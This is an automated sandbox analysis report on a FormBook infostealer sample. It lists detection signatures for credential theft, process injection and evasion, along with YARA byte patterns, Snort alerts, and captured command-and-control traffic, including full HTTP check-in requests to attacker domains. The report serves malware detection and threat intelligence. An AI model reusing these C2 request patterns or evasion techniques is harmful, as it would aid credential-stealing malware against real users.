Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
indent PWS-020199.exe

Overview

General Information

Sample name:indent PWS-020199.exe
Analysis ID:1465309
MD5:66800cae69c4278c8a33921d624b7528
SHA1:e3abc9476cde1dc7ca5a2baa546534d625c0d325
SHA256:64874958438945a29c66851bb23bcb9483955577e941e156d559885cca4a6910
Tags:exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • indent PWS-020199.exe (PID: 7460 cmdline: "C:\Users\user\Desktop\indent PWS-020199.exe" MD5: 66800CAE69C4278C8A33921D624B7528)
    • indent PWS-020199.exe (PID: 7604 cmdline: "C:\Users\user\Desktop\indent PWS-020199.exe" MD5: 66800CAE69C4278C8A33921D624B7528)
      • lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe (PID: 5424 cmdline: "C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • netiougc.exe (PID: 7984 cmdline: "C:\Windows\SysWOW64\netiougc.exe" MD5: DD8D09523CDB5610078DF64BA4889806)
          • lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe (PID: 4320 cmdline: "C:\Program Files (x86)\gViiywGAqDFnuDeYrObRKFjHQKnadWhwklVyFyfLKFwXTeSDVALGZtmQjPClruEOWSCT\lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7220 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.2905672392.00000000035B0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000007.00000002.2905672392.00000000035B0000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2ac40:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x141bf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000002.00000002.1973693176.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000002.00000002.1973693176.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2df03:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x17482:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000007.00000002.2905772961.00000000035F0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 9 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        2.2.indent PWS-020199.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          2.2.indent PWS-020199.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2d103:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x16682:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          2.2.indent PWS-020199.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            2.2.indent PWS-020199.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2df03:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x17482:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            No Sigma rule has matched

            Snort Signatures

            Timestamp:07/01/24-15:12:03.875197
            SID:2855464
            Source Port:49746
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/01/24-15:12:44.166991
            SID:2855464
            Source Port:49758
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/01/24-15:12:17.123480
            SID:2855464
            Source Port:49750
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/01/24-15:12:46.704903
            SID:2855464
            Source Port:49759
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/01/24-15:12:30.379024
            SID:2855464
            Source Port:49754
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/01/24-15:12:33.079742
            SID:2855464
            Source Port:49755
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/01/24-15:12:06.407420
            SID:2855464
            Source Port:49747
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/01/24-15:12:19.661497
            SID:2855464
            Source Port:49751
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for URL or domain
            Source: https://www.mareomnia.com/ya74/?dBOL8fg=Avira URL Cloud: Label: malware
            Multi AV Scanner detection for submitted file
            Source: indent PWS-020199.exeReversingLabs: Detection: 68%
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.indent PWS-020199.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.indent PWS-020199.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000007.00000002.2905672392.00000000035B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1973693176.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2905772961.00000000035F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1974143333.0000000001360000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2904124594.0000000003210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.2905770079.0000000002600000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1975485544.00000000017D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: indent PWS-020199.exeJoe Sandbox ML: detected
            Source: indent PWS-020199.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: indent PWS-020199.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: netiougc.pdbGCTL source: indent PWS-020199.exe, 00000002.00000002.1973943297.0000000001028000.00000004.00000020.00020000.00000000.sdmp, lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe, 00000004.00000003.1911897323.0000000000984000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe, 00000004.00000000.1897417864.000000000063E000.00000002.00000001.01000000.0000000C.sdmp, lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe, 00000008.00000002.2904164622.000000000063E000.00000002.00000001.01000000.0000000C.sdmp
            Source: Binary string: WsRG.pdb source: indent PWS-020199.exe
            Source: Binary string: wntdll.pdbUGP source: indent PWS-020199.exe, 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, netiougc.exe, 00000007.00000002.2906315071.0000000003B4E000.00000040.00001000.00020000.00000000.sdmp, netiougc.exe, 00000007.00000002.2906315071.00000000039B0000.00000040.00001000.00020000.00000000.sdmp, netiougc.exe, 00000007.00000003.1973990257.0000000003656000.00000004.00000020.00020000.00000000.sdmp, netiougc.exe, 00000007.00000003.1975995160.000000000380A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: indent PWS-020199.exe, indent PWS-020199.exe, 00000002.00000002.1974261923.0000000001480000.00000040.00001000.00020000.00000000.sdmp, netiougc.exe, netiougc.exe, 00000007.00000002.2906315071.0000000003B4E000.00000040.00001000.00020000.00000000.sdmp, netiougc.exe, 00000007.00000002.2906315071.00000000039B0000.00000040.00001000.00020000.00000000.sdmp, netiougc.exe, 00000007.00000003.1973990257.0000000003656000.00000004.00000020.00020000.00000000.sdmp, netiougc.exe, 00000007.00000003.1975995160.000000000380A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: WsRG.pdbSHA256 source: indent PWS-020199.exe
            Source: Binary string: netiougc.pdb source: indent PWS-020199.exe, 00000002.00000002.1973943297.0000000001028000.00000004.00000020.00020000.00000000.sdmp, lcrjuTMWUAGqsgBEuAeJAHVUCegE.exe, 00000004.00000003.1911897323.0000000000984000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 7_2_0322BF20 FindFirstFileW,FindNextFileW,FindClose,7_2_0322BF20
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 4x nop then xor eax, eax7_2_03219740
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 4x nop then pop edi7_2_0321E11F
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 4x nop then pop edi7_2_03222438
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 4x nop then pop edi7_2_0322241D
            Source: C:\Windows\SysWOW64\netiougc.exeCode function: 4x nop then mov ebx, 00000004h7_2_038C0542

            Networking

            barindex
            Snort IDS alert for network traffic
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49746 -> 66.96.162.130:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49747 -> 66.96.162.130:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49750 -> 203.161.49.220:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49751 -> 203.161.49.220:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49754 -> 142.250.74.211:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49755 -> 142.250.74.211:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49758 -> 43.132.189.227:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.4:49759 -> 43.132.189.227:80
            Performs DNS queries to domains with low reputation
            Source: DNS query: www.hellokong.xyz
            Source: Joe Sandbox ViewIP Address: 66.96.162.130 66.96.162.130
            Source: Joe Sandbox ViewIP Address: 203.161.49.220 203.161.49.220
            Source: Joe Sandbox ViewASN Name: LILLY-ASUS LILLY-ASUS
            Source: Joe Sandbox ViewASN Name: BIZLAND-SDUS BIZLAND-SDUS
            Source: Joe Sandbox ViewASN Name: VNPT-AS-VNVNPTCorpVN VNPT-AS-VNVNPTCorpVN
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /ya74/?dBOL8fg=+abYdz9ZYlLEbZ/R8RLwLrW/kpiL94aSgfCN/SysWjNm4examNIgFJUZ1S4grBE9mVFVJZjp+t7n4tylmkX4sWpke5fB/OP37jtsRm5e/rz0DcENl95vd9o=&9Zed=oJfxPJMXK HTTP/1.1Host: www.mareomnia.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /7w6o/?dBOL8fg=Iwh3SuFj0OMFYPToOdaCt8n09YMWVwcBCXZ5uIfRfjsROf0gJ1Ep/RQuBjSxRyYqk6VMa+wJUYkrYqg42OI1bOM95Oj9JPajS4UzxvnlYuQuHl4yeh0Z5Q8=&9Zed=oJfxPJMXK HTTP/1.1Host: www.netgain360.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /ov93/?dBOL8fg=4u4yCo7OQPMCdKi2Ln8aiJAigi9vuRKQeDagcagOc8nEJXUOPucQWQe7OcI8vFTvM/uLBaUz+qY2H3sZqNwpjFxKCsR2JAuqbshkvfKiRYpiG9JChfURZOQ=&9Zed=oJfxPJMXK HTTP/1.1Host: www.hellokong.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /jabf/?dBOL8fg=KGlDdtURhni7FGDH6yxlaDZJCfDxicUCgkjw8qWMo8hYydwJ4O2FhRAQ8quBHC5UmxGRc9Sg3+2UwlJVOzJUF0A3C6dQyjGkFiMq3W6NxA+1TkWWAbsUMwI=&9Zed=oJfxPJMXK HTTP/1.1Host: www.artvectorcraft.storeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficHTTP traffic detected: GET /3mcu/?dBOL8fg=QfUAqqYGVyzbjiAj2dnUBJSNi+zHRF4Q6sDLQeB06Snd2Ev4mrer+JTsXVK5M0bFA+ayvTGmBhRWLdOOcrwm0o86bnORrWDNmfnIiMMD3+9d3oxlAeCDNso=&9Zed=oJfxPJMXK HTTP/1.1Host: www.eylmpwjot.storeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
            Source: global trafficDNS traffic detected: DNS query: www.xxikcn20.icu
            Source: global trafficDNS traffic detected: DNS query: www.mareomnia.com
            Source: global trafficDNS traffic detected: DNS query: www.netgain360.online
            Source: global trafficDNS traffic detected: DNS query: www.hellokong.xyz
            Source: global trafficDNS traffic detected: DNS query: www.artvectorcraft.store
            Source: global trafficDNS traffic detected: DNS query: www.eylmpwjot.store
            Source: unknownHTTP traffic detected: POST /7w6o/ HTTP/1.1Host: www.netgain360.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: en-usOrigin: http://www.netgain360.onlineContent-Length: 204Connection: closeCache-Control: max-age=0Content-Type: application/x-www-form-urlencodedReferer: http://www.netgain360.online/7w6o/User-Agent: Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36Data Raw: 64 42 4f 4c 38 66 67 3d 46 79 4a 58 52 62 31 78 2b 66 49 34 63 38 66 6d 57 2b 79 47 6c 64 50 42 2b 4a 77 4e 65 44 38 63 63 42 68 42 6f 59 69 62 66 52 6b 59 50 76 67 74 47 45 41 4c 2f 77 4e 54 44 6a 4b 63 64 57 31 39 69 35 52 65 63 75 49 73 52 72 59 4e 5a 64 6c 73 36 38 41 4c 66 63 46 67 39 63 50 55 45 49 7a 79 54 49 42 59 68 74 43 30 4c 6f 51 43 43 43 77 78 4c 51 30 61 37 44 54 79 72 37 78 70 79 4a 6e 69 45 4d 73 79 32 69 72 65 41 32 64 32 48 58 67 74 6b 32 33 65 34 5a 6d 34 69 6f 6a 4b 79 70 78 69 69 42 72 67 30 76 66 72 4f 45 68 72 50 58 2b 55 43 71 30 2f 58 41 44 33 77 6a 33 67 79 58 68 33 42 41 3d 3d Data Ascii: dBOL8fg=FyJXRb1x+fI4c8fmW+yGldPB+JwNeD8ccBhBoYibfRkYPvgtGEAL/wNTDjKcdW19i5RecuIsRrYNZdls68ALfcFg9cPUEIzyTIBYhtC0LoQCCCwxLQ0a7DTyr7xpyJniEMsy2ireA2d2HXgtk23e4Zm4iojKypxiiBrg0vfrOEhrPX+UCq0/XAD3wj3gyXh3BA==
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Jul 2024 13:12:04 GMTContent-Type: text/htmlContent-Length: 867Connection: closeServer: ApacheLast-Modified: Fri, 10 Jan 2020 16:05:10 GMTAccept-Ranges: bytesAge: 0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; }
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Jul 2024 13:12:06 GMTContent-Type: text/htmlContent-Length: 867Connection: closeServer: ApacheLast-Modified: Fri, 10 Jan 2020 16:05:10 GMTAccept-Ranges: bytesAge: 0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ height:800px; width:100%; }
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Jul 2024 13:12:09 GMTContent-Type: text/htmlContent-Length: 867Connection: closeServer: ApacheLast-Modified: Fri, 10 Jan 2020 16:05:10 GMTAccept-Ranges: bytesAge: 0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 